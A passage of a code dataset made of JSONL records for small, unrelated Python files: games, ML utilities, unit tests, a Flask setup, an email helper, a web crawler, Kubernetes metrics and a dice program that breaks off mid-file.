board\n return board\n \n\ndef main():\n count = 0\n board = [[1,2,3],[4,5,6],[7,8,9]]\n check = True \n while check and count < 4: \n board = DrawMove(board)\n check = VictoryFor(board, 'X')\n DisplayBoard(board)\n \n #if computer win no need 
to take user input, so continue\n        if check == False:\n            continue\n        board = EnterMove(board)\n        check = VictoryFor(board, 'O')\n        \n        # if the user wins, display the board\n        if check == False:\n            DisplayBoard(board)\n        count +=1 \n    \n    # if no one wins and all turns are completed, display the final board\n    if count == 4:\n        DisplayBoard(board)\n    \nif __name__ == \"__main__\":\n    main()\n\n","repo_name":"SnRahman/MY-Codes","sub_path":"tic_toc_toe.py","file_name":"tic_toc_toe.py","file_ext":"py","file_size_in_byte":5015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
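# A compact alternative (sketch, same eight winning lines) to the counting
# loop inside VictoryFor above:
def has_won(board, sign):
    lines = [
        [(0, 0), (0, 1), (0, 2)], [(1, 0), (1, 1), (1, 2)], [(2, 0), (2, 1), (2, 2)],
        [(0, 0), (1, 0), (2, 0)], [(0, 1), (1, 1), (2, 1)], [(0, 2), (1, 2), (2, 2)],
        [(0, 0), (1, 1), (2, 2)], [(0, 2), (1, 1), (2, 0)],
    ]
    return any(all(board[i][j] == sign for i, j in line) for line in lines)

assert has_won([['X', 'X', 'X'], [4, 5, 6], [7, 8, 9]], 'X')
assert not has_won([[1, 2, 3], [4, 5, 6], [7, 8, 9]], 'O')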
+{"seq_id":"26177074158","text":"import unittest\n\nimport dwd\n\n\nclass DWDTest(unittest.TestCase):\n def testFormatStationFilename(self):\n formatted_string = dwd.format_station_filename(\"00001\")\n self.assertEqual(\"tageswerte_KL_00001_\", formatted_string)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"Dens49/dwd-weather-stats","sub_path":"dwd_test.py","file_name":"dwd_test.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"18699581623","text":"from sklearn.preprocessing import MinMaxScaler\nfrom sklearn.datasets import load_iris\n\ndata = load_iris().data\nmms_transfer = MinMaxScaler()\n\"\"\"\n标准化公式:x' = (x-min) / (max-min)\n-------------下面介绍一下几个MinMaxScaler()对象的常用方法-------------\nfit(): 代入数据训练模型\nfit_transform(): 先使用fit的方法,在使用transform的方法,即把数据放入后直接返回标准化后的数据\n\n- 在进行.fit()之后,可以调用以下方法:\n.data_max_: 每个特征的最大值\n.data_min_: 每个特征的最小值\ntransform: 利用训练好的标准化模型对数据集进行标准化\nget_params: 获取模型的参数\ninverse_transform: 逆标准化,即将标准化后的数据集变为原来未处理的形式\n\"\"\"\nmms_transfer.fit(data) # 代入数据训练模型\nprint(f\"数据集每个特征的最大值为:{mms_transfer.data_max_}\")\nprint(f\"数据集每个特征的最小值为:{mms_transfer.data_min_}\")\nprint(f\"标准化的参数为:{mms_transfer.get_params()}\")\ndata_mms = mms_transfer.transform(data) # 用训练好的模型对数据进行标准化\n\n# 如果只需要对数据进行标准化,以下步骤更为简洁:\nmms_transfer = MinMaxScaler()\ndata_transfer = mms_transfer.fit_transform(data) # 调用标准化模型,将数据转化\nprint(f\"标准化后的数据为:{data_transfer}\")\n","repo_name":"Korcat/Machine_Learning","sub_path":"数据预处理/离差标准化.py","file_name":"离差标准化.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"23068109348","text":"import numpy as np\ndef shift(x, k, l, boundary):\n if x.ndim == 2:\n color = 1\n else :\n color = 3\n n1 = np.shape(x)[0]\n n2 = np.shape(x)[1]\n xshifted = np.zeros((n1,n2,color))\n irange = np.mod(np.arange(n1) + k, n1)\n jrange = np.mod(np.arange(n2) + l, n2)\n # firstly move upward then move rightward\n xshifted = x[irange, :][:, jrange]\n if boundary == 'periodical':\n pass\n elif boundary is 'extension':\n m = n1 - k if k > 0 else -k-1\n n = n2 - l if l > 0 else -l-1\n if k != 0:\n xshifted[m::np.sign(k),:,:] = np.tile(xshifted[m-np.sign(k):m-np.sign(k)+1,:,:],(np.sign(k)*k,1,1))\n if l != 0:\n xshifted[:,n::np.sign(l),:] = np.tile(xshifted[:,n-np.sign(l):n-np.sign(l)+1,:],(1,np.sign(l)*l,1))\n elif boundary == 'zero-padding':\n period = xshifted\n xshifted = np.zeros_like(period)\n m = n1 - k if k > 0 else -k-1\n n = n2 - l if l > 0 else -l-1 \n sign_k = np.sign(k) if k != 0 else 1 \n sign_l = np.sign(l) if l != 0 else 1\n if k == 0:\n m = n1\n if l == 0:\n n = n2\n xshifted[:m:sign_k,:n:sign_l,:] = period[:m:sign_k,:n:sign_l,:]\n # mirror\n else:\n m = n1 - k if k > 0 else -k\n n = n2 - l if l > 0 else -l\n add_k = 1 if k < 0 else 0\n add_l = 1 if l < 0 else 0\n if k != 0:\n xshifted[m::np.sign(k),:,:] = xshifted[min(m,m-k):max(m,m-k) + add_k,:,:][::-np.sign(k),:,:]\n if l != 0:\n xshifted[:,n::np.sign(l),:] = xshifted[:,min(n,n-l):max(n,n-l) + add_l ,:][:,::-np.sign(l),:]\n return xshifted\n","repo_name":"shoachia/nlmeans","sub_path":"shift.py","file_name":"shift.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"9158407173","text":"import os\nfrom pdfProcess import list_reform\nfrom pdfProcess import testclip\n\n\ndef zhihmulu2txt(path):\n f = open(path+\"re.zhi2txt1\", encoding=\"utf-8\")\n f2 = open(path+\"re.zhi2txt2\", \"w\", encoding=\"utf-8\")\n linelist = f.readlines()\n for line in linelist:\n if line[0] == \"угг\":\n f2.write(\"# \"+line+\"\\n\")\n f2.write(line+\"\\n\")\n f.close\n f2.close()\n\n\nif __name__ == '__main__':\n path = os.getcwd()+\"/\"\n testclip.copy_text_from_clip(path, \"zhi2txt1\")\n zhihmulu2txt(path)\n","repo_name":"jiangnanqw12/testCode","sub_path":"004_text_process/zhi2txt.py","file_name":"zhi2txt.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"32813618881","text":"# 제목 : 동전 1\n# 분류 : DP, Gold 5\n# 출처 : 백준 2293\n\nn, k = map(int, input().split())\ncoin = [int(input()) for _ in range(n)]\n\ndp = [0] * (k+1)\ndp[0] = 1\n\nfor c in coin:\n for i in range(c, k+1):\n dp[i] += dp[i - c]\n\nprint(dp[k])","repo_name":"41ow1ives/1day2solve","sub_path":"kyounghyeon/BOJ/DP/2293.py","file_name":"2293.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"38"}
+{"seq_id":"42363016","text":"from flask import Flask\nfrom flask_cors import CORS\n\nfrom app.auth.controllers import auth as auth_module, init_jwt\n\n# Define the WSGI application object\n\napp = Flask(__name__)\n\ndef setup_app(app):\n CORS(app)\n\n # Configurations\n app.config.from_object('config')\n\n # Sample HTTP error handling\n @app.errorhandler(404)\n def not_found(error):\n return 'Not found', 404\n\n # Register blueprint(s)\n app.register_blueprint(auth_module)\n init_jwt(app)\n\n","repo_name":"r3mariano/flask-cognito-auth-jwt","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"26875804281","text":"import time\nimport logging\nimport datetime\nimport re\n\nimport html2text\nfrom django.core.mail import EmailMultiAlternatives\nfrom django.conf import settings\nfrom django.template.loader import render_to_string\nfrom django.utils import timezone\n\nfrom djapp import models\n\n\nlogger = logging.getLogger(__name__)\n\n\n\nclass Email:\n def __init__(self, key):\n self.key = key\n\n def _apply_whitelist(self, to):\n whitelist = settings.EMAIL_WHITELIST\n # Apply whitelist\n if whitelist is not None:\n whitelist = whitelist + ['@example.com']\n l = []\n for email in to:\n for allowed_email in whitelist:\n if allowed_email == email or (allowed_email.startswith('@') and email.endswith(allowed_email)):\n l.append(email)\n break\n else:\n logger.info('Skip mail %s: Not in whitelist', email)\n to = l\n return list(set(to))\n\n def send(self, to, context, from_email=None):\n if isinstance(to, str):\n to = [to]\n\n orig_to = to\n to = self._apply_whitelist(to)\n if not to:\n logger.info('Nothing to send. To: before whitelist: %s', orig_to)\n return\n\n # render\n subject = self.render('emails/' + self.key + '_subject.html', context)\n subject = subject.replace('\\n', ' ').replace('\\r', ' ').strip()\n body_html = self.render('emails/' + self.key + '_body.html', context)\n body_text = html2text.html2text(body_html)\n\n msg = EmailMultiAlternatives(\n subject=subject,\n from_email=from_email,\n to=to,\n body=body_text,\n reply_to=['conseiller-numerique@anct.gouv.fr'],\n )\n msg.attach_alternative(body_html, 'text/html')\n logger.info('Send email to %s, from %r, key=%r, subject: %s', to, from_email, self.key, subject)\n msg.send()\n\n def render(self, template_name, context):\n return render_to_string(template_name, context)\n","repo_name":"anct-cnum/conseiller-numerique","sub_path":"back/djapp/utils/emails.py","file_name":"emails.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"38022626344","text":"import os.path\nimport random\nfrom urllib import parse\nfrom urllib import request\nfrom ua_info import ua_list\n\n\ndef get_url(word):\n query_string = {\n 'wd': word\n }\n\n url = \"http://www.baidu.com/s?{}\".format(parse.urlencode(query_string))\n return url\n\n\ndef request_url(url, fileName):\n headers = {\n 'User-Agent': random.sample(ua_list, 1)[0]\n }\n req = request.Request(url=url, headers=headers)\n res = request.urlopen(req)\n html = res.read().decode('utf-8')\n with open(fileName, 'w', encoding='utf-8') as f:\n f.write(html)\n\n\ndef generateFileName(savePath, fileName):\n fileName = os.path.join(savePath, fileName + \".html\")\n return fileName\n\n\nif __name__ == \"__main__\":\n word = \"色图\"\n path = \"/Users/yifanhuang/PycharmProjects/pythonProject/crawler/tutorial/result\"\n request_url(get_url(word), generateFileName(path, \"result1.1\"))\n","repo_name":"yifanHuang129/Crawler_learning","sub_path":"exercise1.1.py","file_name":"exercise1.1.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"13279519459","text":"import pytest\nfrom nose.plugins.skip import SkipTest\nfrom ansible.module_utils import six\nfrom ansible.module_utils.oracle import oci_utils\nfrom ansible.modules.cloud.oracle import oci_app_catalog_subscription_facts\n\ntry:\n    import oci\n    from oci.util import to_dict\n    from oci.core.models import AppCatalogSubscription\n    from oci.exceptions import ServiceError\nexcept ImportError:\n    raise SkipTest(\"test_oci_app_catalog_subscription_facts.py requires `oci` module\")\n\n\nclass FakeModule(object):\n    def __init__(self, **kwargs):\n        self.params = kwargs\n\n    def fail_json(self, *args, **kwargs):\n        self.exit_args = args\n        self.exit_kwargs = kwargs\n        raise Exception(kwargs[\"msg\"])\n\n    def exit_json(self, *args, **kwargs):\n        self.exit_args = args\n        self.exit_kwargs = kwargs\n\n\n@pytest.fixture()\ndef compute_client(mocker):\n    mock_compute_client = mocker.patch(\"oci.core.compute_client.ComputeClient\")\n    return mock_compute_client.return_value\n\n\n@pytest.fixture()\ndef list_all_resources_patch(mocker):\n    return mocker.patch.object(oci_utils, \"list_all_resources\")\n\n\n@pytest.fixture()\ndef call_with_backoff_patch(mocker):\n    return mocker.patch.object(oci_utils, \"call_with_backoff\")\n\n\ndef get_app_catalog_subscription(**kwargs):\n    app_catalog_subscription = AppCatalogSubscription(\n        compartment_id=\"ocid1.compartment.oc1..xxxxxEXAMPLExxxxx\",\n        listing_id=\"ocid1.appcataloglisting.oc1..xxxxxEXAMPLExxxxx\",\n        listing_resource_version=\"1.0\",\n    )\n    for attr, val in six.iteritems(kwargs):\n        setattr(app_catalog_subscription, attr, val)\n    return app_catalog_subscription\n\n\ndef get_app_catalog_subscriptions():\n    return [\n        get_app_catalog_subscription(\n            compartment_id=\"ocid1.compartment.oc1..xxxxxEXAMPLExxxxx\",\n            listing_id=\"ocid1.appcataloglisting.oc1..xxxxxEXAMPLExxxxx1\",\n            listing_resource_version=\"1.0\",\n        ),\n        get_app_catalog_subscription(\n            compartment_id=\"ocid1.compartment.oc1..xxxxxEXAMPLExxxxx\",\n            listing_id=\"ocid1.appcataloglisting.oc1..xxxxxEXAMPLExxxxx2\",\n            listing_resource_version=\"1.0\",\n        ),\n    ]\n\n\ndef get_module(**kwargs):\n    params = {\"compartment_id\": \"ocid1.compartment.oc1..xxxxxEXAMPLExxxxx\"}\n    params.update(kwargs)\n    module = FakeModule(**params)\n    return module\n\n\ndef get_response(status=200, headers=None, data=None, request=None):\n    if not headers:\n        headers = dict()\n    return oci.Response(status, headers, data, request)\n\n\ndef test_list_app_catalog_subscriptions_raises_service_error(\n    compute_client, list_all_resources_patch\n):\n    list_all_resources_patch.side_effect = ServiceError(\n        500, \"InternalServerError\", dict(), \"Internal Server Error\"\n    )\n    with pytest.raises(ServiceError) as exc_info:\n        oci_app_catalog_subscription_facts.list_app_catalog_subscriptions(\n            compute_client, get_module()\n        )\n    se = exc_info.value\n    assert se.status == 500\n    assert se.code == \"InternalServerError\"\n    assert se.message == \"Internal Server Error\"\n\n\ndef test_list_app_catalog_subscriptions_when_no_subscriptions_exist(\n    compute_client, list_all_resources_patch\n):\n    module = get_module()\n    list_all_resources_patch.return_value = []\n    result = oci_app_catalog_subscription_facts.list_app_catalog_subscriptions(\n        compute_client, module\n    )\n    list_all_resources_patch.assert_called_once()\n    list_all_resources_patch.assert_called_with(\n        compute_client.list_app_catalog_subscriptions,\n        compartment_id=module.params[\"compartment_id\"],\n    )\n    assert len(result) == 0\n\n\ndef test_list_app_catalog_subscriptions_when_subscriptions_exist(\n    compute_client, list_all_resources_patch\n):\n    module = get_module()\n    app_catalog_subscriptions = get_app_catalog_subscriptions()\n    list_all_resources_patch.return_value = app_catalog_subscriptions\n    result = oci_app_catalog_subscription_facts.list_app_catalog_subscriptions(\n        compute_client, module\n    )\n    list_all_resources_patch.assert_called_once()\n    list_all_resources_patch.assert_called_with(\n        compute_client.list_app_catalog_subscriptions,\n        compartment_id=module.params[\"compartment_id\"],\n    )\n    assert len(result) == 2\n\n\ndef test_list_app_catalog_subscriptions_filter_by_listing_id(\n    compute_client, list_all_resources_patch\n):\n    listing_id = \"ocid1.appcataloglisting.oc1..xxxxxEXAMPLExxxxx\"\n    module = get_module(listing_id=listing_id)\n    app_catalog_subscription = get_app_catalog_subscription(listing_id=listing_id)\n    list_all_resources_patch.return_value = [app_catalog_subscription]\n    result = oci_app_catalog_subscription_facts.list_app_catalog_subscriptions(\n        compute_client, module\n    )\n    assert len(result) == 1\n    assert result[0][\"compartment_id\"] == app_catalog_subscription.compartment_id\n    assert result[0][\"listing_id\"] == app_catalog_subscription.listing_id\n    list_all_resources_patch.assert_called_with(\n        compute_client.list_app_catalog_subscriptions,\n        compartment_id=module.params[\"compartment_id\"],\n        listing_id=listing_id,\n    )\n","repo_name":"oracle/oci-ansible-modules","sub_path":"test/units/test_oci_app_catalog_subscription_facts.py","file_name":"test_oci_app_catalog_subscription_facts.py","file_ext":"py","file_size_in_byte":5169,"program_lang":"python","lang":"en","doc_type":"code","stars":105,"dataset":"github-code","pt":"38"}
+{"seq_id":"8699218791","text":"from sklearn.naive_bayes import GaussianNB\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.svm import SVC, LinearSVC\nimport numpy as np\nfrom glob import glob\nimport os \nfrom sklearn.model_selection import KFold\nfrom torch import optim\nimport torch \nimport torchvision\nimport torch.nn as nn \nimport time\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.base import BaseEstimator, ClassifierMixin\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import cross_val_score\n\n\ndef evaluate_classifier(clf, X, y, folds=5):\n\t\"\"\"\n\t\tReturns the 5-fold accuracy for classifier clf on X and y\n\t\tArgs:\n\t\t\tclf (sklearn.base.BaseEstimator): classifier\n\t\t\tX (np.ndarray): Digits data (nsamples x nfeatures)\n\t\t\ty (np.ndarray): Labels for dataset (nsamples)\n\t\tReturns:\n\t\t\t(float): The 5-fold classification score (accuracy)\n\t\t\t\n\t\"\"\"\n\tscores = cross_val_score(clf, X, y,cv=KFold(n_splits=5),scoring=\"accuracy\", n_jobs=-1)\n\treturn np.mean(scores)\n\n\ndef calculate_priors(X, y):\n\t\"\"\"Return the a-priori probabilities for every class\n\tArgs:\n\t\tX (np.ndarray): Digits data (nsamples x nfeatures)\n\t\ty (np.ndarray): Labels for dataset (nsamples)\n\tReturns:\n\t\t(np.ndarray): (n_classes) Prior probabilities for every class\n\t\"\"\"\n\toccurances = [0]*len(set(y))\n\tfor label in y :\n\t\toccurances[label]+=1\n\treturn np.asarray(list(map(lambda x: x/len(y),occurances)))\n\ndef gauss_prob(x,mean,var):\n\tif var==0:\n\t\tvar=1e-9\n\tprob = -( np.square(x-mean)/(2*var)) - 0.5*np.log(2*np.pi*var)\n\treturn prob\n \ndef digit_mean(X, y, digit):\n\t'''Calculates the mean for all instances of a specific digit\n\tArgs:\n\t\tX (np.ndarray): Digits data (nsamples x nfeatures)\n\t\ty (np.ndarray): Labels for dataset (nsamples)\n\t\tdigit (int): The digit we need to select\n\tReturns:\n\t\t(np.ndarray): The mean value of the digits for every pixel\n\t'''\n\n\tdigit_indices = []\n\tmean = []\n\tfeature_values = []\n\tfor i,label in enumerate(y) :\n\t\tif label == digit :\n\t\t\tdigit_indices.append(i)\n\n\tfor i in range(len(X[0])):\n\t\t# gather same feature of all digit samples in order to calculate their mean value\n\t\tfor index in digit_indices:\n\t\t\tfeature_values.append(X[index,i])\n\n\t\t# save mean value of digit in mean \n\t\tmean.append(np.asarray(feature_values).mean())\n\t\t\n\t\t#reset feature_values as empty list for next feature of digit \n\t\tfeature_values = []\n\n\treturn np.asarray(mean)\n \n\ndef digit_variance(X, y, digit):\n\t'''Calculates the variance for all instances of a specific digit\n\tArgs:\n\t\tX (np.ndarray): Digits data (nsamples x nfeatures)\n\t\ty (np.ndarray): Labels for dataset (nsamples)\n\t\tdigit (int): The digit we need to select\n\tReturns:\n\t\t(np.ndarray): The variance value of the digits for every pixel\n\t'''\n\tdigit_indices = []\n\tvariance = []\n\tfeature_values = []\n\tfor i,label in enumerate(y) :\n\t\tif label == digit :\n\t\t\tdigit_indices.append(i)\n\n\tfor i in range(len(X[0])):\n\t\t# gather same feature of digit in order to calculate their mean value\n\t\tfor index in digit_indices:\n\t\t\tfeature_values.append(X[index,i])\n\n\t\t# append mean value of same feature of all digit samples in mean \n\t\tvariance.append(np.asarray(feature_values).var())\n\t\t\n\t\t#reset feature_values as empty list for next feature of digit \n\t\tfeature_values = []\n\n\treturn np.asarray(variance)\n\nclass CustomNBClassifier(BaseEstimator, ClassifierMixin):\n\t\"\"\"Custom implementation Naive Bayes classifier\"\"\"\n\n\tdef __init__(self, use_unit_variance=False):\n\t\tself.X_mean_ = None\n\t\tself.use_unit_variance = use_unit_variance\n\t\tself.X_var_= None\n\n\n\tdef fit(self, X, y):\n\t\t\"\"\"\n\t\tThis should fit classifier. All the \"work\" should be done here.\n\t\tCalculates self.X_mean_ based on the mean\n\t\tfeature values in X for each class.\n\t\tself.X_mean_ becomes a numpy.ndarray of shape\n\t\t(n_classes, n_features)\n\t\tfit always returns self.\n\t\t\"\"\"\n\t\tself.y=y\n\t\tself.X_mean_ = np.empty((len(set(y)),X.shape[1]))\n\t\tself.X_var_ = np.empty((len(set(y)),X.shape[1]))\n\n\t\tfor i in range(len(set(y))):\n\t\t\tself.X_mean_[i]=digit_mean(X,y,i)\n\t\t\tself.X_var_[i]=digit_variance(X,y,i)\n\t\t\n\t\t#If use_unit_variance is True set variance for all classes to one\n\t\tif self.use_unit_variance:\n\t\t\tself.X_var_ = np.ones((X.shape[0],X.shape[1]))\n\t\tself.apriori = np.log(calculate_priors(X,y))\n\n\t\treturn self\n\n\n\tdef predict(self, X):\n\t\t\"\"\"\n\t\tMake predictions for X based on the\n\t\teuclidean distance from self.X_mean_\n\t\t\"\"\"\n\t\tself.posterior = np.empty((len(set(self.y)),))\n\t\tself.predicts = np.empty((X.shape[0],),dtype=np.int64)\n\t\tfor i,feutures in enumerate(X):\n\t\t\tfor c in range(len(set(self.y))):\n\t\t\t\tself.posterior[c] =self.apriori[c] + np.sum([gauss_prob(a,self.X_mean_[c][feaut_num],self.X_var_[c][feaut_num]) for feaut_num,a in enumerate(feutures)]) \n\n\t\t\tself.predicts[i] = np.argmax(self.posterior)\n\t\treturn self.predicts\n\n\tdef score(self, X, y):\n\t\t\"\"\"\n\t\tReturn accuracy score on the predictions\n\t\tfor X based on ground truth y\n\t\t\"\"\"\n\t\treturn accuracy_score(np.asarray(self.predict(X)),y)\n\t","repo_name":"savassif/Pattern-Recognition-NTUA","sub_path":"2nd/lib2.py","file_name":"lib2.py","file_ext":"py","file_size_in_byte":4882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"14891609557","text":"import cv2\r\n\r\nclass FaceExtraction:\r\n def face_extraction(self):\r\n # img = cv2.imread(\"D:\\\\SPIT\\\\Semester 4\\\\Mini Project\\\\Wroking Module\\\\VerifyMe\\\\AadharCardProcessing\\\\Asset\\\\aadharCard.png\")\r\n img = cv2.imread(\"D:\\\\SPIT\\\\Semester 4\\\\Mini Project\\\\Wroking Module\\\\VerifyMe\\\\MiddleTier\\\\aadharCard.png\")\r\n # cv2.imshow(img)\r\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n face_cascade = cv2.CascadeClassifier('D:\\\\SPIT\\\\Semester 4\\\\Mini Project\\\\Wroking Module\\\\VerifyMe\\\\AadharCardProcessing\\\\Asset\\\\haarcascade_frontalface_alt.xml')\r\n faces = face_cascade.detectMultiScale(gray, 1.1, 4)\r\n for (x, y, w, h) in faces:\r\n cv2.rectangle(img, (x, y), (x + w, y + h), (0, 0, 255), 2)\r\n faces = img[y:y + h, x:x + w]\r\n cv2.imshow(\"face\", faces)\r\n cv2.imwrite('D:\\\\SPIT\\\\Semester 4\\\\Mini Project\\\\Wroking Module\\\\VerifyMe\\\\AadharCardProcessing\\\\Asset\\\\face.jpg', faces)\r\n cv2.imwrite('D:\\\\SPIT\\\\Semester 4\\\\Mini Project\\\\Wroking Module\\\\VerifyMe\\\\AadharCardProcessing\\\\Asset\\\\detcted.jpg', img)\r\n cv2.imshow('img', img)\r\n cv2.waitKey()","repo_name":"Shivam-Chaubey/autokyc","sub_path":"AadharCardProcessing/faceExtract.py","file_name":"faceExtract.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"30510615826","text":"#\r\n# This file is part of Efforia project.\r\n#\r\n# Copyright (C) 2011-2013 William Oliveira de Lagos \r\n#\r\n# Efforia is free software: you can redistribute it and/or modify\r\n# it under the terms of the Lesser GNU General Public License as published by\r\n# the Free Software Foundation, either version 3 of the License, or\r\n# (at your option) any later version.\r\n#\r\n# Efforia is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n#\r\n# You should have received a copy of the GNU Lesser General Public License\r\n# along with Efforia. If not, see .\r\n#\r\n\r\nfrom django import forms\r\nfrom crispy_forms.helper import FormHelper\r\nfrom crispy_forms.layout import Layout, Div, Hidden, HTML, Field\r\n\r\nclass PhotoForm(forms.Form):\r\n file = forms.FileField(label='')\r\n redirect = forms.CharField(label='')\r\n def __init__(self, *args, **kwargs):\r\n self.helper = FormHelper()\r\n self.helper.form_action = '/efforia/photo'\r\n self.helper.layout = Layout(\r\n Hidden('redirect',value='1'),\r\n Field('file',style='opacity:0; width:0; height:0',css_class='file'),\r\n Div(HTML(\" \"),css_class='upload')\r\n )\r\n super(PhotoForm, self).__init__(*args, **kwargs)\r\n","repo_name":"williamlagos/django-coding","sub_path":"pandora-hub/pandora/hub/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"72901408430","text":"\nfrom kubernetes import client, config\nimport time\nimport pandas as pd\n\ndef metricsCpu():\n try:\n config.load_kube_config()\n api = client.CustomObjectsApi()\n cpu = 0\n memory = 0\n cpul =[]\n memoryl = []\n k8s_nodes = api.list_cluster_custom_object(\"metrics.k8s.io\", \"v1beta1\", \"pods\")\n for stats in k8s_nodes['items']:\n if 'nginx' in stats['metadata']['name']: \n #print(\"Node Name: %s\" % (stats['metadata']['name']))\n #print(stats)\n for c in stats['containers']:\n cpul.append(int(c['usage']['cpu'].split('n')[0])/1000000)\n # memoryl.append(int(c['usage']['memory'].split('Ki')[0])*1024/1048576)\n cpu += int(c['usage']['cpu'].split('n')[0])\n # memory += int(c['usage']['memory'].split('Ki')[0])\n # print(cpul,memoryl)\n print(\"CPU: %s\\t\" %(max(cpul)))\n return max(cpul),0\n except:\n return 0,0\n\nmetricsCpu()\n\n","repo_name":"dj5/Kubernetes_Vertical_Pod_Autoscaling_Using_RL","sub_path":"rl/cpumemory.py","file_name":"cpumemory.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"}
+{"seq_id":"29032024888","text":"import os\n\nfrom entity.humod import Humod as HumodEntity\n\nfrom ..model import Model\nfrom .load import load\n\n\nclass Humod(Model):\n def __init__(self):\n self.omname = \"humod\"\n self.imname = \"\"\n self.ometype = HumodEntity\n\n def dotransform(self, store):\n src = getattr(store.env, \"src\", None)\n ctx = {\n \"base\": getattr(store.env, \"base\", os.getcwd()),\n \"verbose\": getattr(store.env, \"verbose\", False),\n # \"imodel\": src,\n \"omodel\": store.models[\"humod\"],\n \"store\": store,\n }\n load(src, ctx)\n","repo_name":"masol/bot","sub_path":"src/trans/humod/humod.py","file_name":"humod.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"29365474600","text":"import random\n\n\nclass Dado:\n    def __init__(self, min_vel=1, max_vel=6):\n        self.min = min_vel\n        self.min_original = min_vel\n        self.max = max_vel\n        self.max_original = max_vel\n\n    def jogar(self, n_dados=1, separado=False):\n        # Joga os dados no tabuleiro, sorteando um número entre o máximo e mínimo\n        # Sorteia quando vezes for solicitado\n        # Pode devolver só a soma dos sorteios ou o resultado individual de cada\n        numeros = []\n        result = 0\n        x = 0\n        while x < n_dados:\n            x += 1\n            numeros.append(random.randint(self.min, self.max))\n        for x in numeros:\n            result += x\n        if not separado:\n            return result\n        elif separado:\n            return result, numeros\n\n    def altera_min_max(self, min_vel=0, max_vel=6):\n        # Altera valor mínimo e máximo das faces\n        self.min = min_vel\n        self.max = max_vel\n\n    def reseta_valores(self):\n        # Reseta para valoeres originais\n        self.min = self.min_original\n        self.max = self.max_original\n\n\nclass Interacao:\n    def __init__(self, dado_obj):\n        self.dado = dado_obj\n        self.individual = False\n\n    def init(self):\n        # Ao Iniciar o programa\n        print('********************')\n        print('*****DadoSystem*****')\n        print('********************')\n        print('Olá, bem vindo!')\n\n    def tratar(self, string):\n        # Tenta tranformar string em um inteiro, ou deixa a string toda e low\n        result = string.lower()\n        try:\n            result = int(string)\n        finally:\n            return result\n\n    def print_config_alteracao(self):\n        # Print a explicação de como fazer a alteração dos valoeres mínimos e máximos dos dados\n        print(\"-Em caso de dois valores separados por um espaço (' ') \"\n              \"o primeiro será o valor mínimo e p segundo o valor máximo;\")\n        print(\"-Em caso de um único valor, esse valor será inválido;\")\n        print(\n            f\"-Para alterar o valor máximo, coloque {self.dado.min} \"\n            f\"(que é o atual valor mínimo), espaço e o novo valor máximo;\")\n        print(\n            f\"-Para alterar o valor mínimo, coloque o novo valor mínimo, espaço e {self.dado.max} \"\n            f\"(que é o atual valor máximo);\")\n        print(\"-Outras entradas são inválidas.\\n\")\n        self.alterar_max_min()\n\n    def alterar_max_min(self):\n        # Altera valor mínimo e máximo das faces do dado\n        result = input('Qual os valores? (e para explicação):')\n        result = result.lower()\n        if result == 'e':\n            self.print_config_alteracao()\n        else:\n            result = result.split()\n            result_tratado = []\n            for x in result:\n                x = self.tratar(x)\n                if isinstance(x, int):\n                    result_tratado.append(x)\n                else:\n                    result_tratado = 'Inválido'\n            if result_tratado == 'Inválido':\n                print('Inválido')\n            else:\n                min_vel, max_vel = self.desempacotar_alteracoes(result_tratado)\n                self.dado.altera_min_max(min_vel, max_vel)\n                print(f'Novo mínimo {self.dado.min}')\n                print(f'Novo máximo {self.dado.max}')\n\n    def desempacotar_alteracoes(self, vel):\n        # Tenta desempacotar os valores alterados\n        vel_1, vel_2 = 0, 0\n        try:\n            vel_1, vel_2 = vel\n        except:\n            print('Valore inválidos, operação falhou. Os valores foram resetados.')\n            vel_1, vel_2 = self.dado.min_original, self.dado.max_original\n        finally:\n            return vel_1, vel_2\n\n    def alterar_individual(self):\n        # Altera se os valores viram separador ou não\n        if not self.individual:\n            self.individual = True\n            print('Alteração realizada, agora você vera todos os resultados individuais.')\n        elif self.individual:\n            self.individual = False\n            print('Alteração realizada, agora você não vera todos os resultados individuais.')\n\n    def comandos(self):\n        # Printa os comando disponíveis\n        print(\"'' ou 'j' para Jogo simples;\")\n        print(\"Número x para Jogar x vezes o dado;\")\n        print(\"'a' para alterar máximo 